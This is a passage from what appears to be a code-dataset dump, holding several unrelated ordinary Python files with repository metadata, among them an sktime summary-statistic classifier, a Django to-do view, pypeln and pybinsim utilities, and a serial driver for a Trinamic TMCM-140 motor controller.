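toy_policy.world_model = StubGridWorld()
print(toy_policy.get_prob('up', 0))  # 0.25 (2 of the 8 possible (next_state, action) pairs)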
sktime/classification/feature_based/_summary_classifier.py | Rubiel1/sktime | 1 | 9108

# -*- coding: utf-8 -*-
"""Summary Classifier.
Pipeline classifier using the basic summary statistics and an estimator.
"""
__author__ = ["MatthewMiddlehurst"]
__all__ = ["SummaryClassifier"]
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sktime.base._base import _clone_estimator
from sktime.classification.base import BaseClassifier
from sktime.transformations.series.summarize import SummaryTransformer
class SummaryClassifier(BaseClassifier):
"""Summary statistic classifier.
This classifier simply transforms the input data using the SummaryTransformer
transformer and builds a provided estimator using the transformed data.
Parameters
----------
summary_functions : str, list, tuple, default=("mean", "std", "min", "max")
Either a string, or list or tuple of strings indicating the pandas
summary functions that are used to summarize each column of the dataset.
Must be one of ("mean", "min", "max", "median", "sum", "skew", "kurt",
"var", "std", "mad", "sem", "nunique", "count").
summary_quantiles : str, list, tuple or None, default=(0.25, 0.5, 0.75)
Optional list of series quantiles to calculate. If None, no quantiles
are calculated.
estimator : sklearn classifier, default=None
An sklearn estimator to be built using the transformed data. Defaults to a
Random Forest with 200 trees.
n_jobs : int, default=1
The number of jobs to run in parallel for both `fit` and `predict`.
``-1`` means using all processors.
random_state : int or None, default=None
Seed for random, integer.
Attributes
----------
n_classes_ : int
Number of classes. Extracted from the data.
classes_ : ndarray of shape (n_classes)
Holds the label for each class.
See Also
--------
SummaryTransformer
Examples
--------
>>> from sktime.classification.feature_based import SummaryClassifier
>>> from sklearn.ensemble import RandomForestClassifier
>>> from sktime.datasets import load_unit_test
>>> X_train, y_train = load_unit_test(split="train", return_X_y=True)
>>> X_test, y_test = load_unit_test(split="test", return_X_y=True)
>>> clf = SummaryClassifier(estimator=RandomForestClassifier(n_estimators=10))
>>> clf.fit(X_train, y_train)
SummaryClassifier(...)
>>> y_pred = clf.predict(X_test)
"""
_tags = {
"capability:multivariate": True,
"capability:multithreading": True,
}
def __init__(
self,
summary_functions=("mean", "std", "min", "max"),
summary_quantiles=(0.25, 0.5, 0.75),
estimator=None,
n_jobs=1,
random_state=None,
):
self.summary_functions = summary_functions
self.summary_quantiles = summary_quantiles
self.estimator = estimator
self.n_jobs = n_jobs
self.random_state = random_state
self._transformer = None
self._estimator = None
self._transform_atts = 0
super(SummaryClassifier, self).__init__()
def _fit(self, X, y):
"""Fit a pipeline on cases (X,y), where y is the target variable.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The training data.
y : array-like, shape = [n_instances]
The class labels.
Returns
-------
self :
Reference to self.
Notes
-----
Changes state by creating a fitted model that updates attributes
ending in "_" and sets is_fitted flag to True.
"""
self._transformer = SummaryTransformer(
summary_function=self.summary_functions,
quantiles=self.summary_quantiles,
)
self._estimator = _clone_estimator(
RandomForestClassifier(n_estimators=200)
if self.estimator is None
else self.estimator,
self.random_state,
)
m = getattr(self._estimator, "n_jobs", None)
if m is not None:
self._estimator.n_jobs = self._threads_to_use
X_t = self._transformer.fit_transform(X, y)
if X_t.shape[0] > len(y):
X_t = X_t.to_numpy().reshape((len(y), -1))
self._transform_atts = X_t.shape[1]
self._estimator.fit(X_t, y)
return self
def _predict(self, X):
"""Predict class values of n instances in X.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The data to make predictions for.
Returns
-------
y : array-like, shape = [n_instances]
Predicted class labels.
"""
X_t = self._transformer.transform(X)
if X_t.shape[1] < self._transform_atts:
X_t = X_t.to_numpy().reshape((-1, self._transform_atts))
return self._estimator.predict(X_t)
def _predict_proba(self, X):
"""Predict class probabilities for n instances in X.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The data to make predict probabilities for.
Returns
-------
y : array-like, shape = [n_instances, n_classes_]
Predicted probabilities using the ordering in classes_.
"""
X_t = self._transformer.transform(X)
if X_t.shape[1] < self._transform_atts:
X_t = X_t.to_numpy().reshape((-1, self._transform_atts))
m = getattr(self._estimator, "predict_proba", None)
if callable(m):
return self._estimator.predict_proba(X_t)
else:
dists = np.zeros((X.shape[0], self.n_classes_))
preds = self._estimator.predict(X_t)
for i in range(0, X.shape[0]):
dists[i, self._class_dictionary[preds[i]]] = 1
            return dists
coding/reverse_bits/starter.py | skumaravelan/tech-interview-questions | 14 | 9109 | class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
| class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
| en | 0.106937 | # @param n, an integer # @return an integer | 2.786227 | 3 |
Topics/Submitting data/POST Request With Several Keys/main.py | valenciarichards/hypernews-portal | 1 | 9110 | <reponame>valenciarichards/hypernews-portal
from django.shortcuts import redirect
from django.views import View
class TodoView(View):
all_todos = []
def post(self, request, *args, **kwargs):
todo = request.POST.get("todo")
important = request.POST.get("important")
if todo not in self.all_todos:
if important:
self.all_todos = [todo] + self.all_todos
else:
self.all_todos.append(todo)
return redirect("/")
| from django.shortcuts import redirect
from django.views import View
class TodoView(View):
all_todos = []
def post(self, request, *args, **kwargs):
todo = request.POST.get("todo")
important = request.POST.get("important")
if todo not in self.all_todos:
if important:
self.all_todos = [todo] + self.all_todos
else:
self.all_todos.append(todo)
return redirect("/") | none | 1 | 2.190704 | 2 |
|
pypeln/thread/api/to_iterable_thread_test.py | quarckster/pypeln | 1,281 | 9111 | <filename>pypeln/thread/api/to_iterable_thread_test.py
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
import cytoolz as cz
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_from_to_iterable(nums: tp.List[int]):
nums_pl = nums
nums_pl = pl.thread.from_iterable(nums_pl)
nums_pl = cz.partition_all(10, nums_pl)
nums_pl = pl.thread.map(sum, nums_pl)
nums_pl = pl.thread.to_iterable(nums_pl)
nums_pl = list(nums_pl)
nums_py = nums
nums_py = cz.partition_all(10, nums_py)
nums_py = map(sum, nums_py)
nums_py = list(nums_py)
assert nums_py == nums_pl
| <filename>pypeln/thread/api/to_iterable_thread_test.py
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
import cytoolz as cz
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_from_to_iterable(nums: tp.List[int]):
nums_pl = nums
nums_pl = pl.thread.from_iterable(nums_pl)
nums_pl = cz.partition_all(10, nums_pl)
nums_pl = pl.thread.map(sum, nums_pl)
nums_pl = pl.thread.to_iterable(nums_pl)
nums_pl = list(nums_pl)
nums_py = nums
nums_py = cz.partition_all(10, nums_py)
nums_py = map(sum, nums_py)
nums_py = list(nums_py)
assert nums_py == nums_pl
| none | 1 | 2.5772 | 3 |
|
pybinsim/pose.py | fkleinTUI/pyBinSim | 0 | 9112 | import logging
from collections import namedtuple
logger = logging.getLogger("pybinsim.Pose")
class Orientation(namedtuple('Orientation', ['yaw', 'pitch', 'roll'])):
pass
class Position(namedtuple('Position', ['x', 'y', 'z'])):
pass
class Custom(namedtuple('CustomValues', ['a', 'b', 'c'])):
pass
class Pose:
def __init__(self, orientation, position, custom=Custom(0, 0, 0)):
self.orientation = orientation
self.position = position
self.custom = custom
def create_key(self):
value_list = list(self.orientation) + list(self.position) + list(self.custom)
return ','.join([str(x) for x in value_list])
@staticmethod
def from_filterValueList(filter_value_list):
# 'old' format: orientation - position
if len(filter_value_list) == 6:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
return Pose(orientation, position)
# 'new' format: orientation - position - custom
if len(filter_value_list) == 9:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
custom = Custom(filter_value_list[6], filter_value_list[7], filter_value_list[8])
return Pose(orientation, position, custom)
raise RuntimeError("Unable to parse filter list: {}".format(filter_value_list))
| import logging
from collections import namedtuple
logger = logging.getLogger("pybinsim.Pose")
class Orientation(namedtuple('Orientation', ['yaw', 'pitch', 'roll'])):
pass
class Position(namedtuple('Position', ['x', 'y', 'z'])):
pass
class Custom(namedtuple('CustomValues', ['a', 'b', 'c'])):
pass
class Pose:
def __init__(self, orientation, position, custom=Custom(0, 0, 0)):
self.orientation = orientation
self.position = position
self.custom = custom
def create_key(self):
value_list = list(self.orientation) + list(self.position) + list(self.custom)
return ','.join([str(x) for x in value_list])
@staticmethod
def from_filterValueList(filter_value_list):
# 'old' format: orientation - position
if len(filter_value_list) == 6:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
return Pose(orientation, position)
# 'new' format: orientation - position - custom
if len(filter_value_list) == 9:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
custom = Custom(filter_value_list[6], filter_value_list[7], filter_value_list[8])
return Pose(orientation, position, custom)
raise RuntimeError("Unable to parse filter list: {}".format(filter_value_list))
| en | 0.275541 | # 'old' format: orientation - position # 'new' format: orientation - position - custom | 2.798831 | 3 |
morphocut_server/extensions.py | madelinetharp/morphocut-server | 0 | 9113 | <filename>morphocut_server/extensions.py
from flask_sqlalchemy import SQLAlchemy
from flask_redis import FlaskRedis
from flask_migrate import Migrate
# from flask_rq2 import RQ
from rq import Queue
from morphocut_server.worker import redis_conn
database = SQLAlchemy()
redis_store = FlaskRedis()
migrate = Migrate()
redis_queue = Queue(connection=redis_conn)
flask_rq = None
| <filename>morphocut_server/extensions.py
from flask_sqlalchemy import SQLAlchemy
from flask_redis import FlaskRedis
from flask_migrate import Migrate
# from flask_rq2 import RQ
from rq import Queue
from morphocut_server.worker import redis_conn
database = SQLAlchemy()
redis_store = FlaskRedis()
migrate = Migrate()
redis_queue = Queue(connection=redis_conn)
flask_rq = None
| en | 0.480525 | # from flask_rq2 import RQ | 1.520519 | 2 |
acq4/drivers/ThorlabsMFC1/tmcm.py | aleonlein/acq4 | 1 | 9114 | from __future__ import print_function
"""
Low-level serial communication for Trinamic TMCM-140-42-SE controller
(used internally for the Thorlabs MFC1)
"""
import serial, struct, time, collections
try:
# this is nicer because it provides deadlock debugging information
from acq4.util.Mutex import RecursiveMutex as RLock
except ImportError:
from threading import RLock
try:
from ..SerialDevice import SerialDevice, TimeoutError, DataError
except ValueError:
## relative imports not allowed when running from command prompt, so
## we adjust sys.path when running the script for testing
if __name__ == '__main__':
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from SerialDevice import SerialDevice, TimeoutError, DataError
def threadsafe(method):
# decorator for automatic mutex lock/unlock
def lockMutex(self, *args, **kwds):
with self.lock:
return method(self, *args, **kwds)
return lockMutex
COMMANDS = {
'rol': 2,
'ror': 1,
'mvp': 4,
'mst': 3,
'rfs': 13,
'sco': 30,
'cco': 32,
'gco': 31,
'sap': 5,
'gap': 6,
'stap': 7,
'rsap': 8,
'sgp': 9,
'ggp': 10,
'stgp': 11,
'rsgp': 12,
'sio': 14,
'gio': 15,
'calc': 19,
'comp': 20,
'jc': 21,
'ja': 22,
'csub': 23,
'rsub': 24,
'wait': 27,
'stop': 28,
'sco': 30,
'gco': 31,
'cco': 32,
'calcx': 33,
'aap': 34,
'agp': 35,
'aco': 39,
'sac': 29,
'stop_application': 128,
'run_application': 129,
'step_application': 130,
'reset_application': 131,
'start_download': 132,
'stop_download': 133,
'get_application_status': 135,
'get_firmware_version': 136,
'restore_factory_settings': 137,
}
PARAMETERS = { # negative values indicate read-only parameters
'target_position': 0,
'actual_position': 1,
'target_speed': 2,
'actual_speed': 3,
'maximum_speed': 4,
'maximum_acceleration': 5,
'maximum_current': 6,
'standby_current': 7,
'target_pos_reached': 8,
'ref_switch_status': 9,
'right_limit_switch_status': 10,
'left_limit_switch_status': 11,
'right_limit_switch_disable': 12,
'left_limit_switch_disable': 13,
'minimum_speed': -130,
'acceleration': -135,
'ramp_mode': 138,
'microstep_resolution': 140,
'soft_stop_flag': 149,
'ramp_divisor': 153,
'pulse_divisor': 154,
'referencing_mode': 193,
'referencing_search_speed': 194,
'referencing_switch_speed': 195,
'distance_end_switches': 196,
'mixed_decay_threshold': 203,
'freewheeling': 204,
'stall_detection_threshold': 205,
'actual_load_value': 206,
'driver_error_flags': -208,
'encoder_position': 209,
'encoder_prescaler': 210,
'fullstep_threshold': 211,
'maximum_encoder_deviation': 212,
'power_down_delay': 214,
'absolute_encoder_value': -215,
}
GLOBAL_PARAMETERS = {
'eeprom_magic': 64,
'baud_rate': 65,
'serial_address': 66,
'ascii_mode': 67,
'eeprom_lock': 73,
'auto_start_mode': 77,
'tmcl_code_protection': 81,
'coordinate_storage': 84,
'tmcl_application_status': 128,
'download_mode': 129,
'tmcl_program_counter': 130,
'tick_timer': 132,
'random_number': -133,
}
OPERATORS = {
'add': 0,
'sub': 1,
'mul': 2,
'div': 3,
'mod': 4,
'and': 5,
'or': 6,
'xor': 7,
'not': 8,
'load': 9,
'swap': 10,
}
CONDITIONS = {
'ze': 0,
'nz': 1,
'eq': 2,
'ne': 3,
'gt': 4,
'ge': 5,
'lt': 6,
'le': 7,
'eto': 8,
'eal': 9,
'esd': 12,
}
STATUS = {
1: "Wrong checksum",
2: "Invalid command",
3: "Wrong type",
4: "Invalid value",
5: "Configuration EEPROM locked",
6: "Command not available",
}
class TMCMError(Exception):
def __init__(self, status):
self.status = status
msg = STATUS[status]
Exception.__init__(self, msg)
class TMCM140(SerialDevice):
def __init__(self, port, baudrate=9600, module_addr=1):
"""
port: serial COM port (eg. COM3 or /dev/ttyACM0)
baudrate: 9600 by default
module_addr: 1 by default
"""
self.lock = RLock(debug=True)
self.port = port
assert isinstance(module_addr, int)
assert module_addr > 0
self.module_addr = module_addr
self.module_str = chr(module_addr+64)
self._waiting_for_reply = False
SerialDevice.__init__(self, port=self.port, baudrate=baudrate)
@threadsafe
def command(self, cmd, type, motor, value):
"""Send a command to the controller and return the reply.
If an error is returned from the controller then raise an exception.
"""
self._send_cmd(cmd, type, motor, value)
return self._get_reply()
def rotate(self, velocity):
"""Begin rotating motor.
velocity: -2047 to +2047
negative values turn left; positive values turn right.
"""
assert isinstance(velocity, int)
assert -2047 <= velocity <= 2047
if velocity < 0:
direction = 'l'
velocity = -velocity
else:
direction = 'r'
self.command('ro'+direction, 0, 0, velocity)
def stop(self):
"""Stop the motor.
Note: does not stop currently running programs.
"""
self.command('mst', 0, 0, 0)
def move(self, pos, relative=False, velocity=None):
"""Rotate until reaching *pos*.
pos: The target position
relative: If True, then *pos* is interpreted as relative to the current
position
velocity: Optionally set the target velocity before moving
"""
assert isinstance(pos, int)
assert -2**32 <= pos < 2**32
if velocity is not None:
assert isinstance(velocity, int)
assert 0 <= velocity < 2048
raise NotImplementedError()
type = 1 if relative else 0
self.command('mvp', type, 0, pos)
def get_param(self, param):
pnum = abs(PARAMETERS[param])
return self.command('gap', pnum, 0, 0)[4]
def __getitem__(self, param):
return self.get_param(param)
def set_param(self, param, value, **kwds):
"""Set a parameter value.
If valus is 'accum' then the parameter is set from the accumulator
register.
"""
pnum = PARAMETERS[param]
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if pnum in (PARAMETERS['maximum_current'], PARAMETERS['standby_current']) and value > 100:
if kwds.get('force', False) is not True:
raise Exception("Refusing to set current > 100 (this can damage the motor). "
"To override, use force=True.")
if value == 'accum':
self.command('aap', pnum, 0, 0)
else:
self.command('sap', pnum, 0, value)
@threadsafe
def set_params(self, **kwds):
"""Set multiple parameters.
The driver is thread-locked until all parameters are set.
"""
for param, value in kwds.items():
self.set_param(param, value)
def __setitem__(self, param, value):
return self.set_param(param, value)
def get_global(self, param):
"""Return a global parameter or copy global to accumulator.
Use param='gpX' to refer to general-purpose variables.
"""
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = abs(GLOBAL_PARAMETERS[param])
bank = 0
return self.command('ggp', pnum, bank, 0)[4]
def set_global(self, param, value):
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = GLOBAL_PARAMETERS[param]
bank = 0
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if value == 'accum':
self.command('agp', pnum, bank, 0)
else:
self.command('sgp', pnum, bank, value)
def stop_program(self):
"""Stop the currently running TMCL program.
"""
self.command('stop_application', 0, 0, 0)
def start_program(self, address=None):
"""Start running TMCL program code from the given address (in bytes?),
or from the current address if None.
"""
if address is None:
self.command('run_application', 0, 0, 0)
else:
self.command('run_application', 1, 0, address)
def start_download(self, address=0):
"""Begin loading TMCL commands into EEPROM .
"""
self.command('start_download', 0, 0, address)
def stop_download(self):
"""Finish loading TMCL commands into EEPROM.
"""
self.command('stop_download', 0, 0, 0)
def write_program(self, address=0):
return ProgramManager(self, address)
def program_status(self):
"""Return current program status:
0=stop, 1=run, 2=step, 3=reset
"""
return self.command('get_application_status', 0, 0, 0)[4]
def calc(self, op, value):
opnum = OPERATORS[op]
if opnum > 9:
raise TypeError("Operator %s invalid for calc" % op)
self.command('calc', opnum, 0, value)
def calcx(self, op):
opnum = OPERATORS[op]
self.command('calcx', opnum, 0, 0)
def comp(self, val):
self.command('comp', 0, 0, val)
def jump(self, *args):
"""Program jump to *addr* (instruction index).
Usage:
jump(address)
jump(cond, address)
Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd.
"""
if len(args) == 1:
assert isinstance(args[0], int)
self.command('ja', 0, 0, args[0])
else:
cnum = CONDITIONS[args[0]]
self.command('jc', cnum, 0, args[1])
def _send_cmd(self, cmd, type, motor, value):
"""Send a command to the controller.
"""
if self._waiting_for_reply:
raise Exception("Cannot send command; previous reply has not been "
"received yet.")
cmd_num = COMMANDS[cmd]
assert isinstance(type, int)
assert isinstance(motor, int)
# Try packing the value first as unsigned, then signed. (the overlapping
# integer ranges have identical bit representation, so there is no
# ambiguity)
try:
cmd = struct.pack('>BBBBI', self.module_addr, cmd_num, type, motor, value)
except struct.error:
cmd = struct.pack('>BBBBi', self.module_addr, cmd_num, type, motor, value)
chksum = sum(bytearray(cmd)) % 256
out = cmd + struct.pack('B', chksum)
self.write(out)
self._waiting_for_reply = True
def _get_reply(self):
"""Read and parse a reply from the controller.
Raise an exception if an error was reported.
"""
if not self._waiting_for_reply:
raise Exception("No reply expected.")
try:
d = self.read(9)
finally:
self._waiting_for_reply = False
d2 = self.readAll()
if len(d2) > 0:
raise Exception("Error: extra data while reading reply.")
parts = struct.unpack('>BBBBiB', d)
reply_addr, module_addr, status, cmd_num, value, chksum = parts
if chksum != sum(bytearray(d[:-1])) % 256:
raise Exception("Invalid checksum reading from controller.")
if status < 100:
raise TMCMError(status)
return parts
class ProgramManager(object):
def __init__(self, mcm, start=0):
self.mcm = mcm
self.start = start
self.count = 0
def __enter__(self):
self.mcm.lock.acquire()
self.mcm.start_download(self.start)
return self
def __exit__(self, *args):
# insert an extra stop to ensure the program can't leak
# into previously written code.
self.mcm.command('stop', 0, 0, 0)
self.mcm.stop_download()
self.mcm.lock.release()
def __getattr__(self, name):
self.count += 1
return getattr(self.mcm, name)
| from __future__ import print_function
"""
Low-level serial communication for Trinamic TMCM-140-42-SE controller
(used internally for the Thorlabs MFC1)
"""
import serial, struct, time, collections
try:
# this is nicer because it provides deadlock debugging information
from acq4.util.Mutex import RecursiveMutex as RLock
except ImportError:
from threading import RLock
try:
from ..SerialDevice import SerialDevice, TimeoutError, DataError
except ValueError:
## relative imports not allowed when running from command prompt, so
## we adjust sys.path when running the script for testing
if __name__ == '__main__':
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from SerialDevice import SerialDevice, TimeoutError, DataError
def threadsafe(method):
# decorator for automatic mutex lock/unlock
def lockMutex(self, *args, **kwds):
with self.lock:
return method(self, *args, **kwds)
return lockMutex
COMMANDS = {
'rol': 2,
'ror': 1,
'mvp': 4,
'mst': 3,
'rfs': 13,
'sco': 30,
'cco': 32,
'gco': 31,
'sap': 5,
'gap': 6,
'stap': 7,
'rsap': 8,
'sgp': 9,
'ggp': 10,
'stgp': 11,
'rsgp': 12,
'sio': 14,
'gio': 15,
'calc': 19,
'comp': 20,
'jc': 21,
'ja': 22,
'csub': 23,
'rsub': 24,
'wait': 27,
'stop': 28,
'sco': 30,
'gco': 31,
'cco': 32,
'calcx': 33,
'aap': 34,
'agp': 35,
'aco': 39,
'sac': 29,
'stop_application': 128,
'run_application': 129,
'step_application': 130,
'reset_application': 131,
'start_download': 132,
'stop_download': 133,
'get_application_status': 135,
'get_firmware_version': 136,
'restore_factory_settings': 137,
}
PARAMETERS = { # negative values indicate read-only parameters
'target_position': 0,
'actual_position': 1,
'target_speed': 2,
'actual_speed': 3,
'maximum_speed': 4,
'maximum_acceleration': 5,
'maximum_current': 6,
'standby_current': 7,
'target_pos_reached': 8,
'ref_switch_status': 9,
'right_limit_switch_status': 10,
'left_limit_switch_status': 11,
'right_limit_switch_disable': 12,
'left_limit_switch_disable': 13,
'minimum_speed': -130,
'acceleration': -135,
'ramp_mode': 138,
'microstep_resolution': 140,
'soft_stop_flag': 149,
'ramp_divisor': 153,
'pulse_divisor': 154,
'referencing_mode': 193,
'referencing_search_speed': 194,
'referencing_switch_speed': 195,
'distance_end_switches': 196,
'mixed_decay_threshold': 203,
'freewheeling': 204,
'stall_detection_threshold': 205,
'actual_load_value': 206,
'driver_error_flags': -208,
'encoder_position': 209,
'encoder_prescaler': 210,
'fullstep_threshold': 211,
'maximum_encoder_deviation': 212,
'power_down_delay': 214,
'absolute_encoder_value': -215,
}
GLOBAL_PARAMETERS = {
'eeprom_magic': 64,
'baud_rate': 65,
'serial_address': 66,
'ascii_mode': 67,
'eeprom_lock': 73,
'auto_start_mode': 77,
'tmcl_code_protection': 81,
'coordinate_storage': 84,
'tmcl_application_status': 128,
'download_mode': 129,
'tmcl_program_counter': 130,
'tick_timer': 132,
'random_number': -133,
}
OPERATORS = {
'add': 0,
'sub': 1,
'mul': 2,
'div': 3,
'mod': 4,
'and': 5,
'or': 6,
'xor': 7,
'not': 8,
'load': 9,
'swap': 10,
}
CONDITIONS = {
'ze': 0,
'nz': 1,
'eq': 2,
'ne': 3,
'gt': 4,
'ge': 5,
'lt': 6,
'le': 7,
'eto': 8,
'eal': 9,
'esd': 12,
}
STATUS = {
1: "Wrong checksum",
2: "Invalid command",
3: "Wrong type",
4: "Invalid value",
5: "Configuration EEPROM locked",
6: "Command not available",
}
class TMCMError(Exception):
def __init__(self, status):
self.status = status
msg = STATUS[status]
Exception.__init__(self, msg)
class TMCM140(SerialDevice):
def __init__(self, port, baudrate=9600, module_addr=1):
"""
port: serial COM port (eg. COM3 or /dev/ttyACM0)
baudrate: 9600 by default
module_addr: 1 by default
"""
self.lock = RLock(debug=True)
self.port = port
assert isinstance(module_addr, int)
assert module_addr > 0
self.module_addr = module_addr
self.module_str = chr(module_addr+64)
self._waiting_for_reply = False
SerialDevice.__init__(self, port=self.port, baudrate=baudrate)
@threadsafe
def command(self, cmd, type, motor, value):
"""Send a command to the controller and return the reply.
If an error is returned from the controller then raise an exception.
"""
self._send_cmd(cmd, type, motor, value)
return self._get_reply()
def rotate(self, velocity):
"""Begin rotating motor.
velocity: -2047 to +2047
negative values turn left; positive values turn right.
"""
assert isinstance(velocity, int)
assert -2047 <= velocity <= 2047
if velocity < 0:
direction = 'l'
velocity = -velocity
else:
direction = 'r'
self.command('ro'+direction, 0, 0, velocity)
def stop(self):
"""Stop the motor.
Note: does not stop currently running programs.
"""
self.command('mst', 0, 0, 0)
def move(self, pos, relative=False, velocity=None):
"""Rotate until reaching *pos*.
pos: The target position
relative: If True, then *pos* is interpreted as relative to the current
position
velocity: Optionally set the target velocity before moving
"""
assert isinstance(pos, int)
assert -2**32 <= pos < 2**32
if velocity is not None:
assert isinstance(velocity, int)
assert 0 <= velocity < 2048
raise NotImplementedError()
type = 1 if relative else 0
self.command('mvp', type, 0, pos)
def get_param(self, param):
pnum = abs(PARAMETERS[param])
return self.command('gap', pnum, 0, 0)[4]
def __getitem__(self, param):
return self.get_param(param)
def set_param(self, param, value, **kwds):
"""Set a parameter value.
If valus is 'accum' then the parameter is set from the accumulator
register.
"""
pnum = PARAMETERS[param]
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if pnum in (PARAMETERS['maximum_current'], PARAMETERS['standby_current']) and value > 100:
if kwds.get('force', False) is not True:
raise Exception("Refusing to set current > 100 (this can damage the motor). "
"To override, use force=True.")
if value == 'accum':
self.command('aap', pnum, 0, 0)
else:
self.command('sap', pnum, 0, value)
@threadsafe
def set_params(self, **kwds):
"""Set multiple parameters.
The driver is thread-locked until all parameters are set.
"""
for param, value in kwds.items():
self.set_param(param, value)
def __setitem__(self, param, value):
return self.set_param(param, value)
def get_global(self, param):
"""Return a global parameter or copy global to accumulator.
Use param='gpX' to refer to general-purpose variables.
"""
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = abs(GLOBAL_PARAMETERS[param])
bank = 0
return self.command('ggp', pnum, bank, 0)[4]
def set_global(self, param, value):
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = GLOBAL_PARAMETERS[param]
bank = 0
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if value == 'accum':
self.command('agp', pnum, bank, 0)
else:
self.command('sgp', pnum, bank, value)
def stop_program(self):
"""Stop the currently running TMCL program.
"""
self.command('stop_application', 0, 0, 0)
def start_program(self, address=None):
"""Start running TMCL program code from the given address (in bytes?),
or from the current address if None.
"""
if address is None:
self.command('run_application', 0, 0, 0)
else:
self.command('run_application', 1, 0, address)
def start_download(self, address=0):
"""Begin loading TMCL commands into EEPROM .
"""
self.command('start_download', 0, 0, address)
def stop_download(self):
"""Finish loading TMCL commands into EEPROM.
"""
self.command('stop_download', 0, 0, 0)
def write_program(self, address=0):
return ProgramManager(self, address)
def program_status(self):
"""Return current program status:
0=stop, 1=run, 2=step, 3=reset
"""
return self.command('get_application_status', 0, 0, 0)[4]
def calc(self, op, value):
opnum = OPERATORS[op]
if opnum > 9:
raise TypeError("Operator %s invalid for calc" % op)
self.command('calc', opnum, 0, value)
def calcx(self, op):
opnum = OPERATORS[op]
self.command('calcx', opnum, 0, 0)
def comp(self, val):
self.command('comp', 0, 0, val)
def jump(self, *args):
"""Program jump to *addr* (instruction index).
Usage:
jump(address)
jump(cond, address)
Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd.
"""
if len(args) == 1:
assert isinstance(args[0], int)
self.command('ja', 0, 0, args[0])
else:
cnum = CONDITIONS[args[0]]
self.command('jc', cnum, 0, args[1])
def _send_cmd(self, cmd, type, motor, value):
"""Send a command to the controller.
"""
if self._waiting_for_reply:
raise Exception("Cannot send command; previous reply has not been "
"received yet.")
cmd_num = COMMANDS[cmd]
assert isinstance(type, int)
assert isinstance(motor, int)
# Try packing the value first as unsigned, then signed. (the overlapping
# integer ranges have identical bit representation, so there is no
# ambiguity)
try:
cmd = struct.pack('>BBBBI', self.module_addr, cmd_num, type, motor, value)
except struct.error:
cmd = struct.pack('>BBBBi', self.module_addr, cmd_num, type, motor, value)
chksum = sum(bytearray(cmd)) % 256
out = cmd + struct.pack('B', chksum)
self.write(out)
self._waiting_for_reply = True
def _get_reply(self):
"""Read and parse a reply from the controller.
Raise an exception if an error was reported.
"""
if not self._waiting_for_reply:
raise Exception("No reply expected.")
try:
d = self.read(9)
finally:
self._waiting_for_reply = False
d2 = self.readAll()
if len(d2) > 0:
raise Exception("Error: extra data while reading reply.")
parts = struct.unpack('>BBBBiB', d)
reply_addr, module_addr, status, cmd_num, value, chksum = parts
if chksum != sum(bytearray(d[:-1])) % 256:
raise Exception("Invalid checksum reading from controller.")
if status < 100:
raise TMCMError(status)
return parts
class ProgramManager(object):
def __init__(self, mcm, start=0):
self.mcm = mcm
self.start = start
self.count = 0
def __enter__(self):
self.mcm.lock.acquire()
self.mcm.start_download(self.start)
return self
def __exit__(self, *args):
# insert an extra stop to ensure the program can't leak
# into previously written code.
self.mcm.command('stop', 0, 0, 0)
self.mcm.stop_download()
self.mcm.lock.release()
def __getattr__(self, name):
self.count += 1
return getattr(self.mcm, name)
| en | 0.758466 | Low-level serial communication for Trinamic TMCM-140-42-SE controller (used internally for the Thorlabs MFC1) # this is nicer because it provides deadlock debugging information ## relative imports not allowed when running from command prompt, so ## we adjust sys.path when running the script for testing # decorator for automatic mutex lock/unlock # negative values indicate read-only parameters port: serial COM port (eg. COM3 or /dev/ttyACM0) baudrate: 9600 by default module_addr: 1 by default Send a command to the controller and return the reply. If an error is returned from the controller then raise an exception. Begin rotating motor. velocity: -2047 to +2047 negative values turn left; positive values turn right. Stop the motor. Note: does not stop currently running programs. Rotate until reaching *pos*. pos: The target position relative: If True, then *pos* is interpreted as relative to the current position velocity: Optionally set the target velocity before moving Set a parameter value. If valus is 'accum' then the parameter is set from the accumulator register. Set multiple parameters. The driver is thread-locked until all parameters are set. Return a global parameter or copy global to accumulator. Use param='gpX' to refer to general-purpose variables. Stop the currently running TMCL program. Start running TMCL program code from the given address (in bytes?), or from the current address if None. Begin loading TMCL commands into EEPROM . Finish loading TMCL commands into EEPROM. Return current program status: 0=stop, 1=run, 2=step, 3=reset Program jump to *addr* (instruction index). Usage: jump(address) jump(cond, address) Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd. Send a command to the controller. # Try packing the value 